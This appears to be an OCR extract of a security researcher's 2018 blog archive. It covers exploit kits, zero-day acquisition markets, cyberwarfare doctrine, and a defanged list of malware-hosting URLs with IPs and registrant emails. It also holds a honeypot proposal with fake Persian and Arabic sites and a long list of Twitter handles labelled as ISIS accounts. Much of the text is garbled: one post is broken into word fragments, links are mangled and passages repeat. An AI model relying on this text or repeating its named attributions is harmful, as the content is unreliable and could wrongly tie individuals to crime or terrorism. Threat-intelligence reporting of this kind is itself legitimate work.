featuring a specific malware-serving advertising at the targeted Web site including active Web 
site compromise for the purpose of injecting rogue and malicious ads on the targeted host. 
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Related posts: 


¢ [4]Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scare- 
ware 


¢ [5]Cybercriminals Launch Malicious Malvertising Campaign, Thousands of Users Affected 


¢ [6]Managed SWF Injection Cybercrime-friendly Service Fuels Growth Within the Malvertis- 
ing Market Segment 


¢ Buying Access to Hacked Cpanels or Web Servers 


Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture including the active 
utilization of various DIY Web site exploitation and malware-generating cybercriminals continue 
actively utilizing stolen and compromised accounting data for the purpose of injecting malicious 
scripts on the targeted host further compromising the confidentiality availability and integrity 
of the targeted host. 


¢ Harvesting accounting data from malware infected hosts 


Having an administrator access to a domains portfolio, or any type of access though a web 
application backdoor or direct FTP/SSH, has reached its commercial level a long time ago. In 
fact, differentiated pricing applies in this case, on the basis of a site’s page rank, whereas I’ve 
stumbled upon great examples of “underground goods liquidity” as a process, where access to 
a huge domains portfolio though a hacked Cpanels is being offered for cents with the seller’s 
main concern that cents are better than nothing, nothing in the sense that she may loose 
access to the Cpanel before its being sold and thus ends up with nothing. Now, let’s discuss 
the most popular malware exploitation kits currently in the wild. 
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The Most Popular Web Malware Exploitation Kits 


Going into detail about the most common vulnerabilities used in the multitude of web 
malware exploitation kits could be irrelevant from the perspective of their current state of 
“modularity”, that is, once the default installation of the kit contains a rather modest set of 
exploits, the possibility to add new exploits to be used has long reached the point’n’click 
stage. Even worse, localizing the kits to different languages further contributes to their easy 
of use and acceptance on a large scale, just as is their open source nature making it easy for 
coders to use a successful kit’s modules as a foundation for a new one - something’s that’s 
happening already, namely the different between a copycat kit and an original coded from 
scratch one. Among the most popular malware kits remain : 


¢ A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack 


During 2007, Mpack emerged as the most popular malware exploitation kit. Originally 
available for purchase, by the time copies of the kit started leaking out, anyone from a script 
kiddie to a pragmatic attacker have obtained copy of it. Mpack’s main strength is that of its 
well configured default installation, which in a combination with a rather modest, but then 
again, modular set of exploits included, as well as its point’n’click level of sophistication 
automatically turned it into the default malware kit. Mpack’s malware kit has been widely 
used on nearly all of the high-profile malware embedded attacks during 2007, however, its 
popularity resulted in way too much industry attention towards its workings, and therefore, 
malicious parties starting coming up with new kits, still using Mpack as the foundation at least 
from a theoretical perspective. 


The list is endless, the Nuclear Malware kit, Metaphisher, old version of the WebAttacker 
and the Rootlauncher kit, with the latest and most advanced innovation named the Random 
JS Exploitation Kit. Compared to the previous one, this one is going a step beyond the usual 
centralized malicious server. 


With malicious parties now interested in controlling as much infected hosts with as little 
effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient 
way thought web malware exploitation kits in 2008. The events that took place during 2007, 
clearly demonstrate the pragmatic attack approaches malicious parties started applying, 
namely realizing that an outdated but unpatched on a large scale vulnerability is just as 
valuable as a zero day one. 


1. https://ddanchev.blogspot.com/2018/10/dancho-danchevs- 2010-disappearance.htm 
2. https: //speakerdeck.com/ddanchev/cesg-hp-cyberintel-dancho 


ttps://ddanchev.blogspot .com/2017/05/historical-osint- inside-2007-2009.htm 


ttps://ddanchev. blogspot .com/2016/04/cybercriminals-launch-malicious.htm 


Di 
6. https: //ddanchev. blogspot .com/2016/08/managed-swf-injection-cybercrime.htm 


14.6.24 Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons? 
(2018-10-22 17:47) 


zerfelaium 


AS 

[1]ZERODIUM starts paying premium rewards to security researchers to 

acquire their previously unreported zero-day exploits affecting 

multiple operating systems software and/or devices a logical 

question emerges in the context of the program’s usefulness the 

potential benefits including potential vulnerabilities within 

the actual acquisition process - how would the program undermine the security industry and 
what would be the eventual outcome for the security researcher in terms of 


[2]fueling growth in the cyber warfare market segment 
? 


In this post I'll discuss the m 
arket segment for p 
ay-per-exploit 
acquisition progr 
ams 
and discuss in-depth the current exploit- 
acquisition methodology utilized by different vendors 
and provide in-depth discussion on v 
arious over-the-counter 
acquisition methodologies 
applied by m 
alicious 
att 
ackers on their w 
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ay to monetize 

access tom 

alw 

are-infected hosts while compromising the confidenti 
ality 

av 

ail 

ability 

and integrity of thet 

argeted 

host including 

an 

active discussion on the ongoing 
and potenti 

al we 

aponiz 

ation of zero d 

ay vulner 

abilities int the context of tod 
ay’s cyber w 

arf 


are world. 


Having 

greatly realized the potential of acquiring zero day 
vulnerabilities for the purpose of actively exploiting end 
users malicious actors have long been aware of the 
[3]over-the-counter acquisition market model 


further enhancing their capabilities when launching malicious 
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Campaigns. Among the most widely [4]spread myth about zero day vulnerabilities is the fact 


that 


[5]zero day vulnerabilities arethe primary growth factor of the cybercrime ecosystem 


further 


resulting in a multi-tude of malicious activity targeting end 


users. 


With vendors continuing to est 
ablish the found 

ations for 

active vulner 

a bility and exploit 

acquisition progr 

ams third-p 

arty vendors 

and rese 

arch org 


aniz 


ations continue successfully disintermedi 


ating the vendor’s m 

ajor vulner 

ability 

and exploit 

acquisition progr 

ams successfully resulting in the | 
aunch 

and est 

ablishment of third-p 

arty services 

and products further popul 

ating the security-industry with rel 
ated products 

and services potenti 

ally 


acquiring "Know-how" 
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and relev 

ant vulner 

ability 

and exploit inform 
ation from m 

ajor vendors further | 
aunching rel 

ated comp 

anies 

and services potenti 
ally empowering third-p 
arty rese 

archers vendors 

and individu 

als including n 
ation-st 

ate 

actors with potenti 
al we 

aponiz 

ation c 

ap 

abilities potenti 
ally le 

ading to successful t 
arget- 

acquisition pr 
actices on beh 

alf of third-p 

arty rese 

archers 

and individu 


als. 
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Becoming 

at 

arget in the widespread 

context of third-p 

arty vendors 

and rese 

archers might not be the wisest 
appro 

ach when undermining potenti 

al rese 

arch 

and in-house rese 

arch 

and benchm 

arking 

activities in terms of e v alu 

ating 

and responding to vulner 

abilities 

and exploits. Vendors looking for w 
ays to efficiently improve the over 
all security 

and product perform 

ance in terms of security should consider b 
asic intern 

al benchm 

arking pr 


actices and should also consider a possible incentive-based type of vulnerability and exploit 
reward-type of revenue-sharing program potentially rewarding company employees and 
researchers with the necessary tools and incentives to find and discover and report security 
vulnerabilities and exploits. 


Something else worth pointing out in terms of vulnerability research and exploit discovery is 
a process which can be best described as the life-cycle of a zero day vulnerability and exploit 
which can be best described as a long-run process utilized by malicious and fraudulent actors 
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successfully utilizing client-side exploits for the purpose of successfully dropping malicious 
software on the hosts of the targeted victims which often rely on outdated and patched 
vulnerabilities and the overall misunderstanding that zero day vulnerabilities and exploits are 
the primary growth factor of the security-industry and will often rely on the fact that end users 
and enterprises are often unaware of the basic fact that cybercriminals often rely on outdated 
and patched vulnerabilities successfully targeting thousands of users globally on a daily basis. 


What used to be a market-segment dominated by DIY (do-it-yourself) exploit and 
malware-generating tools is today’s modern market-segment dominated by Web 
malware-exploitation kits successfully affecting thousands of users globally on a daily basis. 
In terms of Web-malware exploitation kits among the most common misconceptions 
regarding the utilization of such type of kits is the fact that the cybercriminals behind it rely 
on newly discovered exploits and vulnerabilities which in fact rely on [6Joutdated and already 
patched security vulnerabilities and exploits for the purposes of successfully enticing 
thousands of users globally into falling victim into social-engineering driven malicious and 
fraudulent campaigns. 


Despite the evident usefulness from a malicious actor’s 

point of view when launching malicious campaigns malicious 
actors continue utilizing outdated vulnerabilities for the 
purpose of launching malicious campaigns further utilizing a 
multi-tude of social engineering attack vectors to enhance the 
usefulness of the exploitation vector. Another crucial aspect of 
the pay-per-exploit acquisition vulnerability model is, the 
reliance on outdated and unpatchted vulnerabilities for the 
purpose of launching malicious campaigns further relying on 
the basic fact that on the majority of occasions end users fail to successfully update their 
third-party applications often 

exposing themselves to a variety of successful malicious 
campaigns utilizing outdated and unpatched vulnerabilities. 


We 
expect to continue observing an increase in the pay-per-exploit acquisition model with, 
related acquisition model participants 
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continuing to acquire vulnerabilities further fueling growth 

into the market segment. We expect that malicious actors will 
adequately respond through over-the-counter acquisition models 
including the utilization of outdated and unpatched 
vulnerabilities. End users are advised to continue ensuring that 
their third-party applications are updated to build a general 
security awareness and to ensure that they’re running a fully 
patched antivirus solution. 


Consider going through the following related posts: 

[7]Researchers spot new Web malware exploitation kit 

[8]Web malware exploitation kits updated with new Java exploit 

[9]Which are the most commonly observed Web exploits in the wild? 

[10]Report: Patched vulnerabilities remain prime exploitation vector 

[11]Report: malicious PDF files becoming the attack vector of choice 
[12]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit 
[13]56 percent of enterprise users using vulnerable Adobe Reader plugins 


[14]Report: third party programs rather than Microsoft programs responsible for most 
vulnerabilities 


[15]Report: malicious PDF files becoming the attack vector of choice 
[16]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit 
[17]56 percent of enterprise users using vulnerable Adobe Reader plugins 


[18]Report: third party programs rather than Microsoft programs responsible for most 
vulnerabilities 


[19]Report: 64 % of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege ac- 
counts 


[20]Secunia: popular security suites failing to block exploits 


[21]37 percent of users browsing the Web with insecure Java versions 


5783 


[22]Which are the most commonly observed Web exploits in the wild? 
[23]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 


[24]Secunia: Average insecure program per PC rate remains high 


1. https://zerodium.com/program.htm 
2. https: //www.webroot .com/blog/2013/12/27/cybercrime-trends-2013-year-review/ 


ttp://www.zdnet .com/article/black-market-for-zero-day-vulnerabilities-still-thriving/ 


://www.zdnet.com/article/secunia-popular-security-suites-failing-to-block-exploits/ 
://www.zdnet.com/article/37-percent-of-users-browsing-the-web-with-insecure- java-versions/ 
://waw.zdnet.com/article/which-are-the-most-commonly-observed-web-exploits-in-the-wild/ 


://waw.zdnet.com/article/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/ 


://www.zdnet.com/article/secunia-average- insecure-program-per-pc-rate-remains-high/ 


14.6.25 Joining Team Astalavista - Stay Tuned! (2018-10-22 19:45) 


Dear blog readers | wanted to let everyone know that | will be shortly joining Team Astalavista 
- The World’s Most Popular Information Security Portal acting a Managing Director following a 
successful career as Managing Director through 2003-2006 where | used to maintain [1]a highly 
informative and educational Security Newsletter featuring exclusive content and security in- 
terviews ([2]Security Interviews 2004/2005 - Part 1; [3]Security Interviews 2004/2005 - Part 2; 
[4]Security Interviews 2004/2005 - Part 3) with people from the Scene including daily content 
moderation successfully re-positioning the portal as the [5]World’s Most Popular Information 
Security Portal. 
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How you can help? [6]Consider making a modest donation to ensure a proper and smooth 
launch of the portal. The donation and sponsorship will go to ensure that the launch is properly 
empowered with the necessary tools to ensure a smooth launch. 


Stay tuned! 


1 
2. 
3 
4 
5. i 7 
6. 


ttps://www.pcmag.com/article2/0, 2817, 1781557, 00.asp 


ttps://www.indiegogo.com/projects/astalavista-security-group-2-0-the-underground 


14.7 November 


14.7.1 People’s Information Warfare Concept vs the U.S DoD Cyber Warfare Doctrine 
(2018-11-28 10:27) 


| recently came across to the most recently published [1]DoD Cyberspace Strategy 2018 
which greatly reminded me of a variety of resources that | recently took a look at in terms of 
catching up with some of the latest cyberwarfare trends and scenarios. It appears that the 
U.S is re-claiming back the dominance over the "communication channel" using a variety of 
real-life oriented cyber threats including referencing and citing security researchers and NGOs 
(Non-Profit Organization) as potential threats. Takes you back - doesn’t it? 


We cannot discuss these if we don’t compare their cyber warfare approaches next to 
one another. It’s rather ironic situation, since China has built its cyber warfare doctrine based 
on the research conducted into the topic by U.S military personnel. At a later stage, Chinese 
military thinkers perceived the combination of Sun Tzu’s military strategies in the virtual realm 


The countless number of allegations by countries across the world that China’s As for 
the U.S DoD put in a "catch-up mode" by major news outlets. Pushing the boundaries of the 
irrelevance? That’s for sure. 


- Russia doctrine - people’s information warfare 
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With Russia continuing to dominate the threat landscape of terms of massive and large 
scale economic and financial espionage in the face of cybercrime-driven fraudulent and mali- 
cious economy which can be best described as something in the lines of economic terrorism 


- China doctrine - people’s information warfare - U.S copycats 


- Iran’s doctrine - academic playground 


Let’s compare China’s People’s Army and the U.S DoD to Germany whose vision is that 
if they forbid the use of "hacking tools" to some and real-life pen-testing tools 


The U.S botnet of military hosts was the last indication of total misunderstanding of the 
current threatscape, by putting the emphasis on the "striking capability", which is rather 
logical when you have real-life military personnel converted to cyber warriors. 


A doctrine that’s aiming to prevent sensitive military secrets of leaking is forgetting some 
of the basics of information warfare - disinformation, or come and hack us, and steal our 
tweaked sensitive military secrets. On purposely, disinformation on the actual state of cyber 
warfare preparedness by on purposely suffering security breaches, then whining how they 
have managed to break. 


The left hand never knows what the right one is doing, 


Capability matching vs threat acquisition? 


China’s already reached the unrestricted warfare stage, a phrase when its hacking capa- 
bilities empowered Internet users self-mobilize themselves, the U.S DoD is implementing its 
cyber warfare doctrine, and the rest of the world is whining for yet another password stealer 
for online games that’s phoning back to China. 


A little less conversation, a little more action "babe". 
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Now that’s its becoming increasingly clear that cyber jihad is entering into a "stay tuned 
for a webcast with your favorite terrorist" stage, what we may witness next is terrorist on 
sand-proof Segways. Cutting the sarcasm, it’s becoming boring the listen to the same song 
played on a different media device. 


1. https://fas.org/irp/doddir/dod/jp3_12.pdf 


14.7.2 Historical OSINT - Massive Malicious Software Dropping Campaign Spotted 
in the Wild (2018-11-28 10:37) 


hxxp://ow.ly/3V9eu 


- hxxp://art-spectrum.info/load2/7674/foto.jar - 178.170.250.12 


- hxxp://video-girl.tv/default.aspx - 81.177.3.250 


- Responding to 178.170.250.12 are also hxxp://geoinvest.org and hxxp://power-man.ru 


- Responding to 81.177.3.250 are: 
hxxp://vchat.kladoffka.com - Email: sanny _dbroker@mail.ru 
hxxp://virtualniyseks.in - Email: sereg@hot.ee 
hxxp://odetih.net - Email: reg@legato.name 
hxxp://pornoton.net 

hxxp://russiansgirls.net 

hxxp://videodevki.ru - Email: prezidentbush@yandex.ru 
hxxp://video-girl.ru - Email: admin@video-girl.ru 
hxxp://strip-girl.ru - Email: kinoman-cd@yandex.ru 
hxxp://webcam-girls.ru - Email: srg _surgut@pisem.net 


hxxp://videoshowgirls.ru - Email: gogcnbr@i.ua 
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hxxp://sexy-chat.ru - Email: roman.alexsandr@mail.ru 
hxxp://flirtshow.ru - Email: rusproject99@yandex.ru 
hxxp://chatsexy.ru - Email: roman.alexsandr@mail.ru 
hxxp://rusprivate.su - Email: sadko-as@rambler.ru 
hxxp://video-girl.tv - Email: support@video-people.com 


hxxp://x-chat.tv - Email: x-chat@mail.ru 


14.8 December 


14.8.1 Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cyber- 
crime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52) 


Dear blog readers, | decided to share with everyone a currently pending project investment 
proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform 
with the project proposal draft available on request part of [1]DIA’s Needipedia Project 
Proposal Investment draft or eventually through the [2]Smith Richardson Foundation. 


In case you’re interested in working with me for the purpose of implementing the project 
solution including a possible investment proposal on your behalf - that also includes a possible 
VC or an angel investor introduction - | can be reached at dancho.danchev@hush.com 


Looking forward to receiving your comments questions feedback and general remarks in- 
cluding possible investment proposal requests. Happy Holidays! 


Enjoy! 
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01. Executive summary 


The Obmonix platform aims to build the world’s most versatile and comprehensive sen- 
sor network for intercepting cybercrime and cyber jihad activity on a global scale successfully 


positioning the project as a leading in-house built provider for actionable intelligence within 
the Intelligence Community. 


02. What are you trying to do? 


The Obmonix platform aims to build the world’s most versatile and comprehensive sen- 
sor network for intercepting cybercrime and cyber jihad activity successfully positioning 


the platform as a leading in-house provider of actionable intelligence within the Intelligence 
Community. 


03. How is it currently done? 


Largely relying on a selected set of outsourced intelligence-gathering providers the Intel- 
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ligence Community overall reliance on commercial intelligence gathering providers has 
successfully positioned the Intelligence Community with a limited sight in terms of pro-active 
and systematic response to cybercrime and cyber jihad events globally. 


04. What’s new? 


Largely relying on the utilization of multiple interception vectors including hybrid-based 
type of sensor networks the Intelligence Community is successfully positioned to successfully 
intercept and proactively respond to a growing set of cybercrime and cyber jihad events 
globally. 


05. Who cares? 


The Intelligence Community largely positioned to take advantage of a growing set of 
technologies for the purpose of pro-actively responding to a growing set of cybercrime and 
cyber jihad events globally is ultimately empowered to take advantage of modern hybrid- 
based type of sensor networks for the purpose of successfully intercepting and responding to 
a growing set of cybercrime and cyber jihad events globally. 


06. What are the risks? 


Successfully positioning the provider as a leading provider for actionable intelligence in 
terms of cybercrime and cyber jihad events globally within the Intelligence Community will 
successfully position the Obmonix platform and its operator as a leading provider of actionable 
intelligence within the Intelligence Community. 
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Transmittal Letter 


My name is Dancho Danchev I’m an internationally recognized cybercrime researcher 
security blogger and threat intelligence analyst currently maintaining some of the industry’s 
leading threat intelligence gathering information-sharing resources having successfully con- 
tributed to the overall demise of cybercrime internationally having successfully monitored 
analyzed and processed some of the industry’s major nation-state and malicious actor type of 
malicious campaigns over the last decade leading me to a successful career as a cybercrime 
researcher security blogger and threat intelligence analyst leading me to a successful launch 
of my newly launched startup named Disruptve Individuals and the Obmonix - Cybercrime 
and Cyber Jihad Fighting Sensor Network. 


Having successfully pioneered my own methodology for processing threat intelligence 
data including active dissemination of threat intelligence data to a variety of sources including 
an in-depth understanding of the Intelligence Cycle I’m certain that based on my experience 
the time has come to establish a professional and working relationship with a government- 
private sector enterprise leading me to a successful project proposal within the Intelligence 
Community and the security industry. 


My initial goal for submitting a project proposal is to ensure that the Intelligence Community 
remains on the top of its game and that the United States remains ahead of adversaries looking 
to profit from its economic might including the successful compromise of its infrastructure 
potentially targeting the life’s and well-being of its citizens globally. 


Largely relying on a set of industry-leading contacts my initial idea is to ensure that the 
Intelligence Community remains actively empowered with the world’s largest and most 
comprehensive platform for monitoring profiling and proactively responding to malicious 
nation-state malicious actors type of cybercrime and cyber-jihad activity globally through 
the successful establishing of a government-private sector type of partnership leading me 
to a successful launch of my own company leading me to a successful project-based type of 
project proposal. 


Having actively contributed to the overall demise of cybercrime internationally through 
the last decade I’m certain that my expertise ambition and expertise in the field will success- 
fully contribute to the Intelligence Community’s overall mission including a currently active 
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project within the Intelligence Community and the security industry. 


| sincerely hope that my project proposal will be eventually funded leading me to be- 
come an active participant within the Intelligence Community with a currently active project 
within the Intelligence Community and the security-industry. 
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Company Overview 


The following brief will provide a detailed summary of the company overview including 
key success factors and a project taxonomy. 


Disruptive 
Individuals 


Disruptive Individuals is a research-intensive data-driven company successfully establish- 
ing the world’s largest snapshot of malicious cybercrime activity for the purpose of offering 
the industry the world’s most versatile portfolio of malicious cybercrime-driven services 
successfully positioning itself as the world’s leading provider of real- time intelligence-driven 
services and product portfolio including cybercrime-research data malicious activity profiling 
services and custom-tailored intelligence assessments successfully positioning the company 
as the world’s leading provider of cybercrime-data driven research-intensive intelligence 
data-driven company. 


Key Success Factors 


¢ the platform will be ultimately capable of establishing the industry’s largest data set of 
cybercrime activity for the purpose of real-time monitoring and profiling of malicious cy- 
bercrime activity successfully infiltrating the majority of cybercrime forum communities 
successfully establishing the foundations for an intelligence gathering process 


¢ the platform will be ultimately capable of real-time forum data localization for the purpose 
of successfully establishing the foundations for a successful intelligence gathering process 


¢ the platform will be ultimately capable of establishing the foundations for real-time moni- 
toring and profiling of malicious activity including forum member data successfully estab- 
lishing the foundations for a successful intelligence gathering process 


¢ the platform will be ultimately capable of establishing the world’s largest data set of his- 
torical cybercrime activity successfully establishing the foundations for a successful intel- 
ligence gathering process 
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Return on Investment 


research-based forum activity driven intelligence feeds 


¢ the company will be ultimately capable of offering subscription based type of intelligence 
driven services including intelligence and data-driven cybercrime and malicious-activity 
capable feeds 


* community-driven data processing capabilities 


¢ the company will be ultimately capable of offering public feeds to include the necessary 
data for the purpose of establishing an active community-based intelligence-data driven 
type of intelligence-data driven type of services and feeds 


intelligence feed subscription type of managed intelligence-feed driven services 


¢ the company will be ultimately capable of offering tailored intelligence-driven data feeds 
successfully empowering security enthusiasts security experts researchers and govern- 
ment contractors with the necessary data and expertise to offer an insight into the com- 
pany’s vast network of data and intelligence driven type of services 


Company Data Project Taxonomy 


This intelligence brief will details the basic company project taxonomy structure for the purpose 
of establishing the foundations for a successful data and intelligence-driven type of research 
based type of cybercrime and malicious-activity tracking activity to include but not limited to 
cybercrime community forum data and active social media monitoring and, profiling capabili- 
ties. 
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Cybercrime Sensor Network 


This intelligence brief will details the basic company project taxonomy structure for the purpose 
of establishing the foundations for a successful data and intelligence-driven type of research 
based type of cybercrime and malicious-activity tracking activity to include but not limited to 
cybercrime community forum data and active social media monitoring and profiling capabili- 
ties. 


Spam Message 


¢ spam source 


° spam message 


nation-state actors 


malicious-adversaries 
* country 
¢ hosting provider 


° ASN 


IP reputation 


* message 
5795 


* embedded URL 


* embedded attachment 


Phishing Message 


¢ phishing source 
¢ phishing message 
* nation-state 

¢ malicious-actors 
* spear-phishing 
* targeted-attack 
* country 

¢ hosting provider 
e ASN 

¢ IP reputation 

* message 

* embedded URL 


* embedded attachment 


Malicious Software 


¢ nation-state actors 
* malicious-adversaries 


¢ C &C phone back location 
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* country 

¢ hosting location 
¢ ASN 

* screenshot 


* malicious MD5 


Malicious URL 


nation-state actors 


malicious-adversaries 
¢ country 
¢ hosting provider 


° ASN 


client-side exploitation 


client-side exploit sample 


Android malware 


¢ nation-state actors 

¢ malicious-adversaries 
¢ C &C phone back 

* country 

¢ hosting provider 


° ASN 
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¢ SMS feature 
¢ Screenshot 


* malicious MD5 


Mac OS X malware 


¢ nation-state actors 

¢ malicious-adversaries 
¢ C &C phone back 

* country 

¢ hosting provider 

¢ ASN 

¢ Screenshot 


* malicious MD5 


Explanation of Honeypot Technology 


Honeypot technology greatly ensures that actionable and real-time data of jihadist activities 
can be acquired profiled and analyzed acting as an early warning system for jihadist activity 
online. It relies on the systematic positioning of misconfigured network devices to better allow 
the use of monitoring sensors attracting malicious traffic leading to an eventual compromise 
allowing for better understanding of the motivation and capability estimation of the attacker 
including active motivation and capabilities type of attribution leading to the production of 
actionable real-time type of intelligence type of research and analysis type of data. 
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Honepot Deployment Strategy 


Honeypot technology greatly ensures that actionable and real-time data of jihadist activities 


can be acquired profiled and analyzed acting as an early warning system for jihadist activity 
online. 


¢ Fake Newspaper - Al-Jihah 


The initial idea behind setting up a fake newspaper (in Persian, Arabic) would be to establish 
the foundation for a successful deceptive early warning system sensor further ensuring that 
actionable and real-time jihadist activity data can be collected profiled and interpreted for 
producing real-time intelligence summary reports. Daily updates with pro-jihadist material 
would ensure the quality acquisition of traffic including potential deceptive campaigns to be 
intercepted profiled an analyzed acting as an early warning system sensor further ensuring the 
collection of actionable real-time jihadist activities data. 
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The Al-Jilah newspaper would act as a central repository for, various anti-jihad content suc- 
cessfully positioning the paper as a primary attack target for cyber jihadist online successfully 
increasing the probability for a successful attack and eventually collecting and interpreting the 
attack data. The Al-Jilah newspaper would act as a central repository of anti-jihad content and 
would be localized in Persian in Arabic successfully penetrating local and highly segmented 
markets for the purpose of increasing the probability of a successful attack. 


Various public placement strategy in terms of positioning the honeypot technology within 
the eventual attack compromise activity would include active search engine optimization 
techniques successfully leading to a great degree of capability estimation attack traffic and 


would also result in eventual direct forum placement within various prominent jihadist activity 
online forum communities. 


¢ Fake Bank - Arabah Financing 


The initial idea behind setting up a fake bank (in Persian, Arabic) would be to establish the 
foothold of a deceptive campaign ensuring the collection of actionable real-time time jihadist 
data to be analyzed and profiled. Successfully positioning the bank within the network as- 
sets acquisition would ensure the collection of actionable and real-time jihadist data further 
ensuring the successful interception of jihadist activities online. 
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The initial idea behind setting up a fake bank would be to successfully position a fake Web 
site successfully resulting in the active deployment of honeypot appliance technologies for the 
purpose of monitoring and profiling various jihadist activity online. Successfully setting up a 
fake bank in Persian and Arabic would result in the active penetration of various market seg- 
ment properties successfully resulting in the active profiling and monitoring of jihadist activity 
online. 


Successfully setting up a fake bank would result in the active publication of content inter- 
related news releases emphasizing on major localized and segment released type of content 
successfully resulting in the active profiling and monitoring of various jihadist activity on- 
line.Successful positioning in terms of points of contact would ensure active phishing and 
malware attack profiling and monitoring successfully resulting in active profiling and monitor- 
ing of jihadist activity online. 


¢ Fake university - Abkazah University 


The initial idea behind setting up a fake university (in Persian, Arabic) would be to establish 
the foothold of a deceptive campaign ensuring the collection of actionable real-time time ji- 
hadist data to be analyzed and profiled. Successfully positioning the bank within the network 
assets acquisition would ensure the collection of actionable and real-time jihadist data further 
ensuring the successful interception of jihadist activities online.Successful positioning in terms 
of points of contact would ensure active phishing and malware attack profiling and monitoring 
successfully resulting in active profiling and monitoring of jihadist activity online. 
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The initial idea of setting up a fake university would result in the active profiling and moni- 
toring of various jihadist community type of jihadist activity online successfully positioning a 
localized in Persian and Arabic fake university successfully resulting in the active profiling and 
monitoring of jihadist activity online. Sample fake university content type of localized fake 
university portfolio of facilities and educational courses would result in the active positioning 
for a localized and segmented active profiling and monitoring of jihadist activity online. 


It would consist of active SCADA research and cyber security type of research and analysis 
facility allowing the active monitoring of malicious activity, for the origin source country Iran, 
Pakistan, Saudi Arabia, Iraq and Syria.Successful positioning in terms of points of contact would 
ensure active phishing and malware attack profiling and monitoring successfully resulting in 
active profiling and monitoring of jihadist activity online. 


¢ Fake Company - Ostan Industries 


The initial idea behind setting up a fake company would be to successfully intercept and pro- 
file actionable real-time jihadist activities online to successfully intercept and profile various 
jihadist activities online.The initial idea behind setting up a fake company would be to posi- 
tion a SCADA type of infrastructure localized in Persian, Arabic for the purpose of successfully 
profiling and monitoring various jihadist activity online. 
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With a successful placement and active content generating localized in Persian, Arabic a fake 
company deployment using honeypot appliance technology would result in active capability 
estimation and profiling of various jihadist activity online.Successful positioning in terms of 
points of contact would ensure active phishing and malware attack profiling and monitoring 
successfully resulting in active profiling and monitoring of jihadist activity online. 


Cyber Jihad Sensor Network 


This intelligence brief will details the basic company project taxonomy structure for the purpose 
of establishing the foundations for a successful data and intelligence-driven type of research 
based type of cybercrime and malicious-activity tracking activity to include but not limited to 


cybercrime community forum data and active social media monitoring and profiling capabili- 
ties. 


* forum topic 
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the platform will be ultimately capable of processing a particular forum topic for the purpose 
of establishing the foundations for a successful intelligence gathering process 


¢ forum message 


the platform will be ultimately capable of processing a particular forum message for the 
purpose of establishing the foundations for a successful intelligence gathering process 


¢ forum member 


the platform will be ultimately capable of processing a particular forum member for the 
purpose of establishing the foundations for a successful intelligence gathering process 


* forum member message 


the platform will be ultimately capable of processing a particular forum member message for 
the purpose of establishing the foundations for a successful intelligence gathering process 


¢ forum message 


- the platform will be ultimately capable of processing a particular forum message for the 
purpose of establishing the foundations for a successful intelligence gathering process 


¢ forum message 


- the platform will be ultimately capable of processing a particular forum external message for 
the purpose of successfully establishing the foundations for a successful intelligence gathering 
process 


¢ forum time 
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- the platform will be ultimately capable of processing a particular forum time for the purpose 
of establishing the foundations for a successful intelligence gathering process 


¢ forum data 


the platform will be ultimately capable of processing data including date time message url 
email ultimately establishing the foundations for a successful intelligence gathering process 


¢ forum URL 


the platform will be ultimately capable of processing a particular forum URL further estab- 
lishing the foundation for the Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 


¢ forum media 


the platform will be ultimately capable of processing forum media further establishing th 
foundations for the Obnomix platform further establishing the foundations for a successful 
intelligence gathering process 


¢ forum email 


the platform will be ultimately capable of processing forum email further establishing the 
foundations for the Obnomix platform further establishing the foundations for a successful 
intelligence gathering process 


¢ forum contact 


the platform will be ultimately capable of processing forum contact further establishing the 
foundations for the Obnomix platform further establishing the foundations for a successful 
intelligence gathering process 


Sample ISIS Social Media Twitter Accounts: 
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¢ https://twitter.com/As _soumaly 

¢ https://twitter.com/wilayat _cairo56 
¢ https://twitter.com/ISmisMUJAHIDAH 
¢ https://twitter.com/islamdamas1980 40k 
¢ https://twitter.com/HA _alshami03 
¢ https://twitter.com/jundi71033868 
¢ https://twitter.com/nor92331 

¢ https://twitter.com/WmWmWm57 
¢ https://twitter.com/tytxzxxz 

¢ https://twitter.com/FIININ|2015 

¢ https://twitter.com/BrCdPrsnr 

¢ https://twitter.com/leembfs2017 

¢ https://twitter.com/Sheb84669751 
¢ https://twitter.com/GMCTNT _1979 
¢ https://twitter.com/i593162 

¢ https://twitter.com/bela hudood 

¢ https://twitter.com/ _u_r7yok 

¢ https://twitter.com/kalmat _haaq 

¢ https://twitter.com/meersbo2 

¢ https://twitter.com/iahmd61 

¢ https://twitter.com/TurMedia316 

¢ https://twitter.com/shamtu _33 

¢ https://twitter.com/hoec15 

¢ https://twitter.com/Il41Il 

¢ https://twitter.com/Aljabarti45 

¢ https://twitter.com/abo _roqaia82 

¢ https://twitter.com/inmyheartisis 

¢ https://twitter.com/gurababiz1551 
¢ https://twitter.com/jhkghjy 


¢ https://twitter.com/Hero isis 711 
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https://twitter.com/itc _hallo 
https://twitter.com/TurMedia316 
https://twitter.com/JUI _LJ 
https://twitter.com/SomQaeda 
https://twitter.com/TARLEE4 
https://twitter.com/Muj 93 Hed 
https://twitter.com/dieebkhel 
https://twitter.com/HJdjdu 
https://twitter.com/anwartab 
https://twitter.com/SYRIA _GID 
https://twitter.com/Xkb038 
https://twitter.com/MKoshur2 
https://twitter.com/abutalut8 
https://twitter.com/AEJKhalil 
https://twitter.com/abu2legend 
https://twitter.com/Ggeflfwlemqpdmf 
https://twitter.com/alhlby027 
https://twitter.com/SuehwShehe 
https://twitter.com/sdsdsd325245 
https://twitter.com/gffggll1 
https://twitter.com/ISIS _1979GMC 
https://twitter.com/dola24687 
https://twitter.com/timbosulli 
https://twitter.com/f75da586675f456 
https://twitter.com/khilafahinfos 
https://twitter.com/allbasra 
https://twitter.com/Muhaajirah _ 
https://twitter.com/abufalahalhind4 
https://twitter.com/Saeed _alHalabi0 
https://twitter.com/iislamic12 


https://twitter.com/TaWhEeD _O 
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¢ https://twitter.com/avuOmar shams 
¢ https://twitter.com/abouanstunisi 
